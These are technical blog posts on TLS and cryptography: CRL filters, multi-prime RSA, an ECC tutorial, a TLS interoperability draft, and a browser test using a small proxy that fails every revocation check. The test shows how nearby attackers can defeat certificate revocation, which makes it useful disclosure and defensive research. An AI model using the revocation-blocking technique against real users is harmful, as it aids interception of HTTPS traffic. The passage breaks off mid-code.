After this, b is your matrix filter. Given b, one can hash an element to generate a vector, multiply by b and get the original value back. If the equation was in M then the result has to be 1. Otherwise, the result is a random element from the field. If you use GF(2^10) as the field, then the false positive probability is 1 in 1024.

As an example, consider the case of a two element set. You would hash these elements into equations that define lines in the plane and the matrix filter is the intersection of these lines. Querying the filter means hashing the element to form a line and seeing if it intersects that point.
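The same idea in code, as a rough sketch rather than anything from the paper. To keep the arithmetic to plain modular integers it swaps GF(2^10) for the prime field of integers mod 1021, so the false positive rate is about 1 in 1021. The salt-and-retry loop for the rare singular matrix, and every name here, are assumptions made for the example.

```python
import hashlib

P = 1021  # a prime, standing in for GF(2^10)

def row_for(item: bytes, n: int, salt: int):
    """Hash an item into n field elements: one row of the matrix."""
    row = []
    for i in range(n):
        digest = hashlib.sha256(b"%d:%d:" % (salt, i) + item).digest()
        row.append(int.from_bytes(digest[:8], "big") % P)
    return row

def solve(rows):
    """Solve M·b = 1 (mod P) by Gaussian elimination; None if M is singular."""
    n = len(rows)
    m = [row[:] + [1] for row in rows]  # augment with the column of ones
    for col in range(n):
        pivot = next((r for r in range(col, n) if m[r][col]), None)
        if pivot is None:
            return None
        m[col], m[pivot] = m[pivot], m[col]
        inverse = pow(m[col][col], -1, P)
        m[col] = [x * inverse % P for x in m[col]]
        for r in range(n):
            if r != col and m[r][col]:
                factor = m[r][col]
                m[r] = [(x - factor * y) % P for x, y in zip(m[r], m[col])]
    return [m[r][n] for r in range(n)]

def build(items):
    """Return (salt, b); retry with a new salt if the rows are dependent."""
    for salt in range(100):
        b = solve([row_for(item, len(items), salt) for item in items])
        if b is not None:
            return salt, b
    raise ValueError("could not find an invertible matrix")

def contains(matrix_filter, item):
    """Hash the item to a row and check that row·b equals 1."""
    salt, b = matrix_filter
    row = row_for(item, len(b), salt)
    return sum(x * y for x, y in zip(row, b)) % P == 1
```

Note that a query touches every element of b, which is the reason a real deployment would have to chunk the filter.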

Matrix filters can also be used to associate values with the elements. In this case, for an element in the set you'll always get the correct value and for anything else you'll get a random value. (So you don't get to know if the element was in the set in this case.)

Matrix filters hit the lower bound, but have some issues. First, in order to query the filter you have to read and process the whole filter, so you will have to chunk it. Secondly, if your false positive rate is not of the form 1/2^n, then the field arithmetic is slower. But I'll deal with the most important problem, from my point of view, next.

Back to the motivation for a moment: we're looking to sync a global view of CRLs to browsers. The initial download is one thing, but we also have to push updates frequently (probably daily). That means that delta encoding is terribly important.

Delta compressing a compressed Bloom filter or a GCS is pretty obvious with a range coder in hand. Additions and deletions from the set are just additions and deletions of bits or values, respectively. But changes to a matrix filter mean rewriting everything. Consider the example of lines in a plane: changing one of the lines moves the intersection point in both dimensions.

So, in order to add elements you would either have to retransmit the chunks that they fall into or send an additional chunk (that would have to be checked every time). Deletions can't be realised without retransmitting a whole chunk so, over time, the useful fraction of elements in a chunk would fall. Since a GCS is only about 15% bigger, it wouldn't take long for the matrix filter to be worse off.

So, although matrix filters are beautiful, I think a GCS works best. I suspect that there's a deep reason why a structure which hits the lower size bound cannot be delta compressed, but I'm too dumb to figure it out if there is.

In the process of playing with this, I implemented everything to some degree. I'll throw the code on github at some point.

Multi-prime RSA trade offs

(This is a technical post: casual readers should skip it.)

I couldn't find data on the speed/security trade offs of multi-prime RSA anywhere, so I gathered the data myself and hopefully this blog post can be found by people in the future.

I used the equations from Lenstra (Unbelievable security: Matching AES security using public key systems, in ASIACRYPT 2001) and scaled them so that two-prime, 1024-bit RSA is 80 bits. The speed numbers are from OpenSSL for a single core of a Xeon E5520 at 2.3GHz.

I'm assuming a 2048-bit modulus. The blue, horizontal lines are the estimated difficulty of the NFS for 2048 and 1024-bit composites. The blue curve is the estimated difficulty of factoring a multi-prime composite using ECM. Really you don't want to choose so many primes that this drops below the NFS level.

[Figure: security (bits) and speed (ops/s) plotted against the number of primes, from 2 to 8.]

A couple of useful observations from this data: For 2048-bits, 3 primes is the most you want (this is confirmed by table 1 of this paper). Also, if your CA is requiring a 2048-bit modulus, you can use seven primes to get basically the same speed and security as a 1024-bit key.

This is the same data, in table form:

1024-bits (80-bit NFS security)

n    ops/s    ECM security
2    1807     104
3    2680     86
4    4305     75

2048-bits (107-bit NFS security)

n    ops/s    ECM security
2    279      148
3    524      121
4    872      106
5    1047     95
6    1263     87
7    1579     81
8    1997     77

4096-bits (144-bit NFS security)

n    ops/s    ECM security
2    38       213
3    77       173
4    135      150
5    193      135
6    254      123
7    288      114
8    409      107
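For anyone wondering where the speed comes from: with the Chinese Remainder Theorem, the private operation is done modulo each prime separately and the results are recombined, so more primes means smaller numbers in each exponentiation. The following toy sketch shows the mechanics with three tiny primes. The primes, the function name and the unpadded "message" are all illustrative assumptions, and none of this is suitable for real use.

```python
from math import prod

def crt_private_op(c, primes, d):
    """Compute c^d mod n, where n is the product of the distinct primes given."""
    n = prod(primes)
    result = 0
    for p in primes:
        # Work modulo p only: both the base and the exponent shrink.
        partial = pow(c % p, d % (p - 1), p)
        # Recombine using the standard CRT basis element for p.
        others = n // p
        result += partial * others * pow(others, -1, p)
    return result % n

primes = [1009, 1013, 1019]        # toy sizes; real primes are hundreds of bits
n = prod(primes)
phi = prod(p - 1 for p in primes)
e = 65537
d = pow(e, -1, phi)                # private exponent

message = 123456789
ciphertext = pow(message, e, n)
assert crt_private_op(ciphertext, primes, d) == message
```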

Revocation doesn't work

When an HTTPS certificate is issued, it's typically valid for a year or two. But what if something bad happens? What if the site loses control of its key?

In that case you would really need a way to invalidate a certificate before it expires and that's what revocation does. Certificates contain instructions for how to find out whether they are revoked and clients should check this before accepting a certificate.

There are basically two methods for checking if a certificate is revoked: certificate revocation lists (CRLs) and OCSP. CRLs are long lists of serial numbers that have been revoked while OCSP only deals with a single certificate. But the details are unimportant, they are both methods of getting signed and timestamped statements about the status of a certificate.

But both methods rely on the CA being available to answer CRL or OCSP queries. If a CA went down then it could take out huge sections of the web. Because of this, clients (and I'm thinking mainly of browsers) have historically been forgiving of an unavailable CA.

But an event this week gave me cause to wonder how well revocation actually works. So I wrote the world's dumbest HTTP proxy. It's just a convenient way to intercept network traffic from a browser. HTTPS requests involve the CONNECT method, which is implemented. All other requests (including all revocation checks) simply return a 500 error. This isn't even as advanced as Moxie's trick of returning 3.
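A proxy along those lines takes only a few dozen lines. What follows is a sketch of the idea, not the proxy used for these tests: the names classify, relay, Handler and main, and the choice of port 8080, are all assumptions for illustration.

```python
import select
import socket
import socketserver

def classify(request_line: bytes):
    """Return ("tunnel", host, port) for CONNECT, or ("reject",) otherwise."""
    parts = request_line.split()
    if len(parts) == 3 and parts[0] == b"CONNECT":
        host, _, port = parts[1].rpartition(b":")
        if host and port.isdigit():
            return ("tunnel", host.decode("ascii"), int(port))
    return ("reject",)

def relay(a, b):
    """Copy bytes in both directions until either side closes."""
    while True:
        readable, _, _ = select.select([a, b], [], [])
        for source in readable:
            data = source.recv(65536)
            if not data:
                return
            (b if source is a else a).sendall(data)

class Handler(socketserver.StreamRequestHandler):
    def handle(self):
        request_line = self.rfile.readline()
        # Discard the remaining request headers.
        while self.rfile.readline() not in (b"\r\n", b"\n", b""):
            pass
        action = classify(request_line)
        if action[0] == "reject":
            # Plain HTTP, which includes OCSP and CRL fetches, always fails.
            self.wfile.write(b"HTTP/1.1 500 Internal Server Error\r\n"
                             b"Content-Length: 0\r\nConnection: close\r\n\r\n")
            return
        _, host, port = action
        with socket.create_connection((host, port)) as upstream:
            # The browser waits for this reply before starting TLS.
            self.wfile.write(b"HTTP/1.1 200 Connection established\r\n\r\n")
            relay(self.connection, upstream)

def main():
    """Listen on localhost; point the browser's proxy settings here."""
    with socketserver.ThreadingTCPServer(("127.0.0.1", 8080), Handler) as server:
        server.serve_forever()
```

Calling main() starts the proxy. HTTPS connections are tunnelled through untouched, so the only thing the browser loses is its ability to fetch revocation information.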

To be clear, the proxy is just for testing. An actual attack would intercept TCP connections. The results:

Firstly, IE 8 on Windows 7:

No indication of a problem at all even though the revocation checks returned 500s. It's even EV.

(Aside: I used Wireshark to confirm that revocation checks weren't bypassing the proxy. It's also the case that SChannel can cache revocation information. I don't know how to clear this cache, so I simply used a site that I hadn't visited before. Also confirming that a cache wasn't in effect is the fact that Chrome uses SChannel to verify certificates and Chrome knew that there was an issue.)

Firefox 3.6 on Windows 7, no indication:

Update: George Macon pointed out that Firefox removes the EV indication from this site. I'm not a regular Firefox user so I'm afraid that I didn't notice:

Chrome 12 on Windows 7:

There's something at least! We can click on it...

So Chrome has an indication but it's the same indication as mixed-content and I suspect that rather a lot of people will ignore it. There is one saving grace, Chrome implements HSTS and for HSTS sites, revocation failure is fatal:

Update: I changed this behaviour. See http://www.ietf.org/mail-archive/web/websec/current/msg00296.html

On other platforms, the story is much the same. Safari doesn't indicate that anything is wrong, nor does Firefox 4 on OS X, nor Firefox 3.6 on Linux. Chrome on Mac is the same as Windows, but on Linux doesn't indicate and doesn't protect HSTS sites. (Chrome Linux's behaviour is due to a limitation in NSS as I understand it.)

So, what's the effect? Well it depends where an attacker is. If the attacker is spoofing a site and is situated close to the site then they can attack all users, because they can get all the traffic destined for the site. However, such an attacker probably can't intercept traffic to the CA's servers, so revocation will actually work because the users will receive a firm ‘revoked’ message from the CA. If the attacker is close to the user, then they can only attack a smaller number of users, but they can intercept traffic to the CA and thus defeat revocation. Attacks in Tunisia and on open WiFi networks are the sort of attacks which can defeat revocation.

So should browsers be stricter about revocation checking? Maybe, but it does mean that a CA outage would disable large parts of the web. Imagine if Verisign corrupted their revocation database and were down for six hours while they rebuilt it. A global outage of large parts of the HTTPS web like that would seriously damage the image of web security to the point where sites would think twice about using HTTPS at all.

(You can configure Firefox to be strict about checking if you wish: security.OCSP.require in about:config.)

A much better solution would be for certificates to only be valid for a few days and to forget about revocation altogether. This doesn't mean that the private key needs to change every few days, just the certificate. And the certificate is public data, so servers could just download their refreshed certificate over HTTP periodically and automatically (like OCSP stapling). Clients wouldn't have to perform revocation checks (which are very complex and slow), CAs wouldn't have to pay for massive, DDoS-proof serving capacity and revocation would actually work. If the CA went down for six hours, nobody would care. Only if the CA were down for days would there be a problem. If you want to “revoke” a certificate, just stop renewing it.

HSTS UI in Chrome

HSTS is designed to address the fact that HTTP is the default protocol on the web. You might run a secure site that redirects everyone to HTTPS, but your users will just type in foo.com and that initial HTTP request is vulnerable to manipulation and SSL stripping attacks.

HSTS allows sites to advertise that they are HTTPS only. See the Chromium site page for more details.
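Concretely, a site opts in by sending a Strict-Transport-Security response header over HTTPS, carrying a max-age in seconds and an optional includeSubDomains flag. As a rough sketch of what a client does with it (parse_hsts is a hypothetical helper, not Chrome's code, and it skips the stricter syntax checks a real parser would make):

```python
def parse_hsts(header_value: str):
    """Parse a Strict-Transport-Security value into (max_age, include_subdomains)."""
    max_age = None
    include_subdomains = False
    for directive in header_value.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.strip().lower()  # directive names are case-insensitive
        if name == "max-age":
            max_age = int(value.strip().strip('"'))
        elif name == "includesubdomains":
            include_subdomains = True
    if max_age is None:
        raise ValueError("max-age is required")
    return max_age, include_subdomains

# A year-long policy that also covers subdomains.
print(parse_hsts("max-age=31536000; includeSubDomains"))
```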

However, it's difficult to test HSTS. Chrome's HSTS database stores only the hashes of sites (which may not have been the right choice, but I don't see sufficient motivation to change it at the moment) so it's hard to edit by hand. There are tools like craSH's Chrome-STS to help edit the database, but it's too hard for the average developer.

So I've added a debugging UI to Chrome to query, add and remove entries from the HSTS database. You have to type about:net-internals into the address bar and click the HSTS tab. You also need a version of Chrome after r75282. Today that means a trunk build but it should be in the dev channel release next week. Until then, here's a screenshot:

So, if you want to see if your site will break before deploying HSTS, you can add an entry locally for it and find out. Modifications persist on disk and have an expiry of 1000 days. You can also use it as a way to elect to always access sites via HTTPS (e.g. mail.google.com).

Origin poisoning

Mixed-scripting is when an HTTPS page loads resources like Javascript, CSS or plugins over HTTP. It's a subset of `mixed-content' but it's the really dangerous subset: by controlling those types of resources a network attacker can take control of the whole page rather than just, say, a single image.

Chrome, unlike other browsers, tracks mixed-scripting for origins rather than for pages. This means that, if page x triggers mixed-scripting and you follow a link to another page, y, in the same origin, we'll decorate y with mixed-scripting warnings even if it's clean when considered in isolation. This is because Javascript can control other pages in the same origin, see this paper.

Chrome's detection actually errs a little on the side of too many warnings. Strictly speaking, if there's only a single page open in the origin and you navigate it, then there's nowhere for evil Javascript to hide and so the next page can be clean. Chrome, rather, considers an origin to be poisoned once it has triggered mixed-scripting and that taint is only lifted once that renderer process has shut down.

(Although there's also an argument to be made that Chrome's behavior is fine. Consider this case: you log into a web email client and the front page has mixed scripting. Then you click a link to compose an email. The compose page might be free of mixed-scripting and all the evil Javascript might have been flushed. But the mixed-scripting could have switched your cookies and logged you in as the attacker's account. Now, when you send the email, it'll appear in the attacker's `Sent Mail'.)

But that's all background. The problem is that developers get confused about these mixed-scripting warnings and invariably blame Chrome. If you have a mixed-scripting issue occur on a page which redirects, or in an HTTPS iframe on an HTTP site, then the Javascript console doesn't help you. It can be very difficult to figure out what the problem is.

So I've landed a patch in Chrome which logs mixed-scripting to the debug log no matter where it occurs. Just get a build after r74119 (see about:version) and follow the instructions to enable debugging logging.

Still not computationally expensive

F5 have put up a blog post explaining why my previous statements about SSL's computational costs are a myth. I'm glad that the idea is getting out there!

Keep in mind, however, that F5 want to sell you SSL hardware and that the blog post is a marketing piece. (I've never used F5 products but, from the client side, I've never found any problems with them either.)

Some assertions in the text are simple and wrong, so I'll just point these out:

  • “All commercial certificate authorities now issue only 2048-bit keys”: clearly wrong, as anyone can confirm.
  • They link to a nearly 5-year old version of the NIST guidelines rather than the guidelines issued last month.
  • Their numbers for RSA operations per second are both slow (they match my 2.3GHz, Core2 laptop) and per core. An eight-core server is over eight times faster than they suggest!
  • “Obviously the more servers you have, the more certificates you need to deploy”: bizarrely, they assume that you're putting a different certificate on each server.

Certificate lengths

It's true that NIST have recommended that 1024-bit certificates should be phased out by 2013. CA certificates should be 2048-bit now and we need to work to remove the 1024-bit ones.

But even in 2013 it's still going to take tens of millions of dollars of computer hardware a year to factor a 1024-bit RSA key. If you're the sort of organisation which is considering deploying HTTPS do you think that your attackers are going to do that, or are they going to bribe someone to steal the private key from the servers?

Likewise, SSL hardware will probably make your key harder to steal via a software exploit, but keys can be revoked and the problem dealt with. There are some organisations where hardware protected keys make sense, but for 99% of sites, key material isn't what's important. It would be far more damaging for customer data to be dumped on the web and SSL hardware doesn't save you there.

As we go towards 2013, CAs will try to issue fewer 1024-bit certificates and 2048-bit certificates are 5x slower. But it only takes one CA to start issuing ECDSA certificates along with a 2048-bit RSA one and the problem is much less vexing. Browsers largely support it and you can serve the ECDSA certificate to the ones which do and the RSA to the rest. P256-ECDSA is about as fast as 1024-bit RSA. The only problem is that people don't know to demand it from their CAs so the CAs don't do it yet.

Ciphers

RC4 has good key agility, it's a stream cipher (which saves bytes on the wire), it's quick and very well analysed. It's not the strongest cipher in the world, but it's significantly stronger than some other parts of the SSL ecosystem. With overwhelming probability, you are not the sort of organisation that needs to worry about attackers brute-forcing your cipher.

All together now...

SSL is just not that computationally expensive any more. Here are the real costs of HTTPS deployment these days:

  • Virtual hosting still doesn't work in the real world because Microsoft never put support into Windows XP.
  • Sorting out mixed content issues on your website.

The F5 article does mention the first of these, but SSL hardware doesn't help with either of them.

All sites should deploy HTTPS because attacks like Firesheep are too easy to do. Even sites where you don't login should deploy HTTPS (imagine the effect of spoofing news websites at a major financial conference to headline “Market crashes”). You should use HSTS to stop sslstrip. But you are probably not the sort of organisation which needs to worry about multi-million dollar attacks aimed at factoring your key.

Unfortunate current practices for HTTP over TLS

(For amusement value.)

Network Working Group                                         A. Langley
Internet-Draft                                                Google Inc
Expires: July 5, 2011                                           Jan 2011


            Unfortunate current practices for HTTP over TLS
                      draft-agl-tls-oppractices-00

Abstract

   This document describes some of the unfortunate current practices
   which are needed in order to transport HTTP over TLS on the public
   Internet.

Status of this Memo

   This Internet-Draft is submitted to IETF in full conformance with the
   provisions of BCP 78 and BCP 79.

   Internet-Drafts are working documents of the Internet Engineering
   Task Force (IETF), its areas, and its working groups.  Note that
   other groups may also distribute working documents as Internet-
   Drafts.

   Internet-Drafts are draft documents valid for a maximum of six months
   and may be updated, replaced, or obsoleted by other documents at any
   time.  It is inappropriate to use Internet-Drafts as reference
   material or to cite them other than as "work in progress."

   The list of current Internet-Drafts can be accessed at
   http://www.ietf.org/ietf/1id-abstracts.txt.

   The list of Internet-Draft Shadow Directories can be accessed at
   http://www.ietf.org/shadow.html.

   This Internet-Draft will expire on July 5, 2011.

Copyright Notice

   Copyright (c) 2011 IETF Trust and the persons identified as the
   document authors.  All rights reserved.

   This document is subject to BCP 78 and the IETF Trust's Legal
   Provisions Relating to IETF Documents
   (http://trustee.ietf.org/license-info) in effect on the date of
   publication of this document.  Please review these documents
   carefully, as they describe your rights and restrictions with respect
   to this document.  Code Components extracted from this document must
   include Simplified BSD License text as described in Section 4.e of
   the Trust Legal Provisions and are provided without warranty as
   described in the BSD License.


Table of Contents

   1.  Introduction
   2.  Handshake message fragmentation
   3.  Protocol Fallback
   4.  More implementation mistakes
   5.  Certificate Chains
   6.  Insufficient Security
   7.  Acknowledgements
   8.  Normative References
   Appendix A.  Changes
   Author's Address


1.  Introduction

   HTTP [RFC2616] is one of the most common application level protocols
   transported over TLS [RFC5246].  (This combination is commonly known
   as HTTPS based on the URL scheme used to indicate it.)  HTTPS clients
   have to function with a huge range of TLS implementations, some of
   higher quality than others.  This text aims to document some of the
   behaviours of existing HTTPS clients that are designed to ensure
   maximum interoperability.

   This text should not be taken as a recommendation that future HTTPS
   clients adopt these behaviours.  The security implications of each
   need to be carefully considered by each implementation.  However,
   these behaviours are common and the authors consider it better to
   document the state of practice than to simply wish it were otherwise.


2.  Handshake message fragmentation

   Many servers will fail to process a handshake message that spans more
   than one record.  These servers will close the connection when they
   encounter such a handshake message.  HTTPS clients will commonly
   ensure against that by either packing all handshake messages in a
   flow into a single record, or by creating a single record for each
   handshake message.


3.  Protocol Fallback

   Despite it being nearly twelve years since the publication of TLS 1.0
   [RFC2246], around 3% of HTTPS servers will reject a valid TLS
   "ClientHello".  These rejections can take the form of immediately
   closing the connection or a fatal alert.  Intolerance to the
   following has been observed:

      Advertising version TLS 1.0.

      Advertising a TLS version greater than TLS 1.0 (around 2% for 1.1
      or 1.2, around 3% for greater than 1.2).

      Advertising a version greater than 0x03ff (around 65% of servers)

      The presence of any extensions (around 7% of servers)

      The presence of specific extensions ("server_name" and
      "status_request" intolerance has been observed, although in very
      low numbers).

      The presence of any advertised compression algorithms

   Next, some servers will misbehave after processing the "ClientHello"
   message.  Negotiating the use of "DEFLATE" compression can result in
   fatal "bad_record_mac", "decompression_failure" or
   "decryption_failed" alerts.  Notably, OpenSSL prior to version 0.9.8c
   will intermittently fail to process compressed finished messages due
   to a work around of a previous padding bug.

   Lastly, some servers will negotiate the use of SSLv3 but select a
   TLS-only cipher suite.

   In all these cases, HTTPS clients will often enter a fallback mode.
   The connection is retried using only SSLv3 and without advertising
   any compression algorithms.  (This is obviously an easy downgrade
   attack.)  Also, the fallback can be triggered by transient network
   problems, which often manifest as an abruptly closed connection.
   Since SSLv3 does not provide any means of Server Name Indication
   [RFC3546], the fallback connection can use the wrong certificate
   chain, resulting in a very surprising certificate error.


4.  More implementation mistakes

   Non-fatal errors in version negotiation also occur.  Some 0.2% of
   servers use the version from the record header.  Around 0.6% of
   servers require that the version in the "ClientHello" and record
   header match in order to respect the version in the "ClientHello".  A
   very low number of servers echo whatever version the client
   advertises.

   In the event that the client supports a higher protocol version than
   the server, about 0.4% of servers require that the RSA
   "ClientKeyExchange" message include the server's protocol version.

   Some 30% of servers don't check the version in an RSA
   "ClientKeyExchange" at all.


5.  Certificate Chains

   Certificate chains presented by servers will commonly be missing
   intermediate certificates, have certificates in the wrong order and
   will include unrelated, superfluous certificates.  Servers have been
   observed presenting more than ten certificates in what we assume is a
   drive-by shooting approach to including the correct intermediate
   certificate.

   In order to validate chains which are missing certificates, some
   HTTPS clients will collect intermediate certificates from other
   servers.  Clients will commonly put all the presented certificates
   into a set and try to validate a chain assuming only that the first
   certificate is the leaf.


6.  Insufficient Security

   Some 65% of servers support SSLv2 (beyond just supporting the
   handshake in order to upgrade to SSLv3 or TLS).  HTTPS clients will
   typically not support SSLv2, nor send SSLv2 handshakes by default.
   Of those servers, 80% support the export ciphersuites.  (Although
   about 3% of those servers negotiate weak ciphersuites only to show a
   warning.)

   Some servers will choose very small multiplicative group sizes for
   their ephemeral Diffie-Hellman exchange (for example, 256-bits).
   Some HTTPS clients will reject all multiplicative group sizes smaller
   than 512-bits while others will retry after demoting DHE ciphersuites
   in their "ClientHello".


7.  Acknowledgements

   Yngve Pettersen made significant contributions and many of the
   numbers in this document come from his scanning work.  Other numbers
   were taken from Ivan Ristic's SSL Survey.

   Thanks to Wan Teh Chang for reviewing early drafts.


8.  Normative References

   [RFC2246]  Dierks, T. and C. Allen, "The TLS Protocol Version 1.0",
              RFC 2246, January 1999.

   [RFC2616]  Fielding, R., Gettys, J., Mogul, J., Frystyk, H.,
              Masinter, L., Leach, P., and T. Berners-Lee, "Hypertext
              Transfer Protocol -- HTTP/1.1", RFC 2616, June 1999.

   [RFC3546]  Blake-Wilson, S., Nystrom, M., Hopwood, D., Mikkelsen, J.,
              and T. Wright, "Transport Layer Security (TLS)
              Extensions", RFC 3546, June 2003.

   [RFC5246]  Dierks, T. and E. Rescorla, "The Transport Layer Security
              (TLS) Protocol Version 1.2", RFC 5246, August 2008.

OpenSSH 5.7 with ECC support

OpenSSH 5.7 has been released and its major notable new feature is support for ECDH key agreement and ECDSA host and user keys.

What a difference a prime makes

In a previous post I covered some of the issues with implementing ECC operations. I also mentioned the problems with the number of terms in the P256 prime.

Having spent a fair amount of time optimising OpenSSL's elliptic curve code, here are the current speeds:

[Figure: operations per core-second plotted against security level (bits) for 1024-bit DH, 2048-bit DH, P224, curve25519, P256 and P521.]

(The graph is inline SVG. Can't see it? Get a better browser.)

P224 and P256 are not, fundamentally, very different. However, P256 has a nasty prime formation, as I explained previously, which kills the speed. Sadly, if you want to support the existing fleet of browsers, P256 is your fastest option.

(The multiplicative DH is measured using OpenSSL's code. curve25519 is my own code, based on djb's. P224 is Emilia Kasper's, inspired by curve25519. P521 is my own code based on Emilia's. P256 is my own code, also based on Emilia's, with a very different form in an attempt to get it running faster.)

(The measurements are taken on a single core of my 2.3GHz Xeon E5520. They are a scalar multiplication of the base point followed by a scalar multiplication of the result. They don't include point validation. The OpenSSL code involves additional overhead from the BIGNUM conversions, however I consider that fair game because you have to do them if you want to use the code.)

Elliptic curves and their implementation (pointer)

If you read this via Google Reader (or, possibly, other feed readers) then the last post won't have appeared, possibly because of the inline SVG (getting cut by the bleeding edge again).

So, click to read Elliptic curves and their implementation.

Elliptic curves and their implementation

So what's an elliptic curve? Well, for starters, it's not an ellipse. An elliptic curve is a set of points on a plane which satisfy an equation of the form y^2 = x^3 + ax + b.

As an example, here's the elliptic curve y^2 = x^3 - 3x + 3:

[Figure: plot of the elliptic curve, with both axes running from -3 to 3.]

(Thanks to Wolfram Alpha for plotting the curve. Can't see the diagram? Get a better browser).

At this point I'm going to point out that I'm omitting details in order to keep things simple and I'm going to keep doing it without mentioning it again. For example, that elliptic curve equation is based on a transformation which is only valid if the underlying field characteristic is neither 2 nor 3. If you want the full details then you should read up. Carrying on …

So the elliptic curve is the set of points which satisfy an equation like that. For the curve above you can see that (1, 1) and (1, -1) are both on the curve and a quick mental calculation should confirm that they fit into the equation.
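If mental arithmetic isn't your thing, the check is a one-liner. This is just a sketch over plain integers for the example curve; on_curve is a name made up here.

```python
def on_curve(x, y, a=-3, b=3):
    """True if (x, y) satisfies y^2 = x^3 + ax + b (default: the example curve)."""
    return y * y == x ** 3 + a * x + b

print(on_curve(1, 1))    # 1 == 1 - 3 + 3
print(on_curve(1, -1))   # the reflection in the x-axis is on the curve too
print(on_curve(2, 1))    # 1 != 8 - 6 + 3, so this point is not
```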

But the points on an elliptic curve aren't just a set of points: with a small hack they have a structure to them which is sufficient to form a group. (A group is a mathematical term, not just a noun that I pulled from the air.)

Being a group requires four things: that you can add two elements to get a third element which is also in the group. That this is true for all elements: (a + b) + c = a + (b + c). That there's a zero element so that a + 0 = a. Finally that, for every element, there's a negative of that element (written -a), so that a + -a = 0.

And, when you define addition correctly, the set of points on an elliptic curve has that structure. Also, the addition rule for elliptic curves has a very nice graphical definition, so I can give you a couple more diagrams.

The addition rule says that, to add a and b, you draw a line from a to b, intersect it with the curve and reflect in the x-axis:

[Figure: the line through points a and b meets the curve at a third point, which is reflected in the x-axis to give a+b]

There's a slight wrinkle in this: what if a and b are the same point? A line needs two, distinct points to be defined.

So there's a special rule for doubling a point: you take the tangent to the curve at that point, intersect it with the curve and then reflect in the x-axis:

[Figure: the tangent at point a meets the curve at a second point, which is reflected in the x-axis to give 2a]

So we defined addition, but the zero element is a bit of a hack. First, we define the negative of an element to be its reflection in the x-axis. We know that adding an element and its negative results in the zero element so think about what adding an element and its reflection means. We draw a line from the element to its reflection, which means that the line is vertical. Now we have to find the third point where that line intersects the curve. But, from looking at the y^2 term of the equation, it's clear that the curve only has two solutions for any given x value. So the line doesn't intersect the curve!

And this is where the zero element comes from. It's called the point at infinity and it's a magic element which is infinitely far away. This means that the vertical line ends up hitting it. It also means that it's directly above every point so, when you add the zero element to a point, you get its reflection which you then reflect back to the original point.
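The rules so far can be sketched in a few lines of Python. This is only an illustration for the example curve y^2 = x^3 - 3x + 3: it uses exact fractions in place of real numbers, represents the point at infinity as None, and the function names are my own.

```python
from fractions import Fraction

A, B = -3, 3  # coefficients of the example curve y^2 = x^3 - 3x + 3


def on_curve(p):
    """True for the point at infinity (None) or a point satisfying the equation."""
    if p is None:
        return True
    x, y = p
    return y * y == x**3 + A * x + B


def add(p, q):
    """Chord-and-tangent addition; None is the zero element."""
    if p is None:
        return q
    if q is None:
        return p
    (x1, y1), (x2, y2) = p, q
    if x1 == x2 and y1 == -y2:
        return None  # vertical line: a point plus its reflection is zero
    if p == q:
        slope = (3 * x1 * x1 + A) / (2 * y1)  # tangent at the point
    else:
        slope = (y2 - y1) / (x2 - x1)  # line through the two points
    x3 = slope * slope - x1 - x2
    y3 = slope * (x1 - x3) - y1  # third intersection, reflected in the x-axis
    return (x3, y3)


p = (Fraction(1), Fraction(1))
neg_p = (Fraction(1), Fraction(-1))
doubled = add(p, p)
print(doubled, on_curve(doubled))
print(add(p, neg_p))  # None, i.e. the point at infinity
print(add(p, doubled), on_curve(add(p, doubled)))
```

Doubling (1, 1) gives (-2, -1) because the tangent there happens to be horizontal, and adding that back to (1, 1) gives (13/9, -35/27), which still satisfies the curve equation.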

And, with that brief wart, we have a group! But what's the point? Well, given addition, you can define multiplication (it's just repeated addition). So, given a curve and a point on that curve (called the base point and written G), you can calculate some multiple of that point. But, given the resulting point, you can't feasibly work backwards to find out what the multiple was. It's a one-way function.

To see how this might be useful for cryptography our old friends, Alice and Bob, enter the scene. They are standing in a room with lots of other people and would like a private conversation, but there's not enough room. Thankfully, Alice and Bob both know a standard, public elliptic curve and base point. Each thinks up a random number and multiplies the base point by that number.

We'll call Alice's random number a and Bob's, b. Each tells the other (and, therefore, everyone) aG and bG: the multiples of the base point. So Alice knows a and bG and multiplies the latter by the former to get abG. Bob knows b and aG and multiplies the latter by the former to get baG. abG = baG so both now have a shared, private key. The other people in the room know only aG and bG and they can't divide to get either a or b, so they can't calculate the secret.

(That's an elliptic curve Diffie-Hellman key agreement.)

Implementing elliptic curve operations in software.

The diagrams for addition and doubling are pretty, but aren't code. Thankfully they translate pretty easily into equations which can be found at the top of the EFD page for Short Weierstrass curves (which is the specific subset of elliptic curve that we're dealing with).

Those equations are defined in terms of affine coordinates (i.e. (x,y) pairs) but serious implementations will invariably use a transformation. Transformations are applied at the start of a long calculation so that the steps of the calculation are easier. The transformation can be reversed at the end to get affine coordinates out.

A common example of a transformation is the use of polar coordinates. When working with points on the plane, working with polar coordinates can make some calculations vastly easier. Elliptic curve transformations are like that, although with different transformations.

The transformations that you'll commonly see are Jacobian coordinates and XZ (aka Montgomery's trick), although the latter sort of isn't invertible (more on that later).

The underlying field

When we defined the elliptic curve, above, we talked about a set of points but we never defined a point. Well, a point on the plane can be represented as an (x,y) pair, but what are x and y? If this were a maths class they would be elements of ℝ, the set of real numbers. But real numbers on computers are either very slow or approximate. The rules of the group quickly break down if you are only approximate.

So, in cryptographic applications, we use an alternative, finite field. (Again, field is a mathematical term, like group.) The finite fields in this case are the numbers modulo a prime. (Although all finite fields of the same size are isomorphic so it doesn't really matter.)
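With a finite field in hand, the key agreement between Alice and Bob can be sketched end to end. The curve here is a toy one (y^2 = x^3 + 2x + 2 over the integers mod 17, with base point (5, 1)), chosen by me purely so the numbers stay small; it offers no security, and the double-and-add loop is not constant time.

```python
import secrets

P = 17        # toy field prime (assumption; real fields are hundreds of bits)
A, B = 2, 2   # toy curve y^2 = x^3 + 2x + 2 over the integers mod 17
G = (5, 1)    # base point on the toy curve
ORDER = 19    # G generates a group of 19 elements, including the zero element


def add(p, q):
    """Group addition; None stands for the point at infinity."""
    if p is None:
        return q
    if q is None:
        return p
    (x1, y1), (x2, y2) = p, q
    if x1 == x2 and (y1 + y2) % P == 0:
        return None  # a point plus its negative is the zero element
    if p == q:
        slope = (3 * x1 * x1 + A) * pow(2 * y1 % P, -1, P) % P
    else:
        slope = (y2 - y1) * pow((x2 - x1) % P, -1, P) % P
    x3 = (slope * slope - x1 - x2) % P
    y3 = (slope * (x1 - x3) - y1) % P
    return (x3, y3)


def scalar_mult(k, point):
    """Multiply a point by k using repeated doubling and adding."""
    result = None
    while k:
        if k & 1:
            result = add(result, point)
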